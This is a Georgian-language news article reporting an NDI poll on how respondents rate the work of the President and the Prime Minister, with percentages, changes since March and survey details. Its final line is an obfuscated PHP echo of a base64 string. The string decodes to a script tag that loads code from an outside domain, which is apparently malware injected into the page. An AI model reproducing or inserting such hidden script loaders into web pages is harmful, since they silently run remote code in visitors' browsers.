celsiusi
ავერსი საქკაბელი

 NDI-ის კვლევის მიხედვით, გამოკითხულთა უმრავლესობა საქართველოს პრეზიდენტის საქმიანობას საშუალოდ ან კარგად აფასებს.

კითხვაზე, როგორ შეაფასებდნენ პრეზიდენტის საქმიანობას, გამოკითხულთა 16 პროცენტი ამბობს, რომ კარგად აფასებს, 41 პროცენტი საშუალოდ, 30 პროცენტი კი ცუდად აფასებს პრეზიდენტის საქმიანობას. არ ვიცი – 11-მა პროცენტმა უპასუხა, ხოლო გამოკითხულთა ერთმა პროცენტმა უარი განაცხადა პასუხზე.

ამ შემთხვევაში, მიმდინარე წლის მარტის თვესთან შედარებით, დადებითობის მაჩვენებელი ერთი პროცენტით შემცირდა, ხოლო უარყოფითი მაჩვენებელი ორი პროცენტით გაიზარდა.

პრეზიდენტის საქმიანობის შეფასება, კვლევის მიხედვით, მსგავსია სხვადასხვა ჯგუფს შორის. თუმცა კვლევაში აღნიშნულია, რომ სალომე ზურაბიშვილის საქმიანობას კაცები უფრო კრიტიკულად აფასებენ, ვიდრე ქალები.

რაც შეეხება NDI-ის კვლევას პრემიერის საქმიანობის შეფასებაზე, გამოკითხულთა უმრავლესობა საქართველოს პრემიერ-მინისტრის საქმიანობას საშუალოდ ან კარგად აფასებს.

კითხვაზე, როგორ შეაფასებდნენ პრემიერ-მინისტრის საქმიანობას, გამოკითხულთა 29 პროცენტი დადებითად აფასებს, 37 პროცენტი საშუალოდ აფასებს.

პრემიერ-მინისტრის საქმიანობას უარყოფითად აფასებს 26 პროცენტი. ეს მაჩვენებელი მიმდინარე წლის მარტთან შედარებით ორი პროცენტით შემცირდა. ექვსი პროცენტით გაიზარდა მაჩვენებელი, რომელიც საშუალოდ აფასებს პრემიერის საქმიანობას, ხოლო ერთი პროცენტით შემცირდა მაჩვენებელი, რომელიც მუშაობას კარგად აფასებს.

გამოკითხულთა შვიდი პროცენტი პასუხობს, რომ არ იცის, ხოლო ერთი პროცენტი უარს ამბობს პასუხის გაცემაზე.

კვლევაში აღნიშნულია, რომ თბილისელები, ახალგაზრდები და ოპოზიციის მხარდამჭერები პრემიერს ოდნავ უფრო კრიტიკულად აფასებენ.

 

NDI-ის ინფორმაციით, აღნიშნული ანგარიში 14 ოქტომბრიდან 4 ნოემბრამდე ქვეყნის მასშტაბით ჩატარებულ, საქართველოს ზრდასრული მოსახლეობის წარმომადგენლობით პირისპირი გამოკითხვის შედეგებს ემყარება (ოკუპირებული ტერიტორიების გამოკლებით). ოქტომბერში ჩატარებული გამოკითხვა სულ 2,068 დასრულებულ ინტერვიუს მოიცავს. საშუალო ცდომილების ზღვარი კვლევაში +/- 2,2 პროცენტია.

291
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");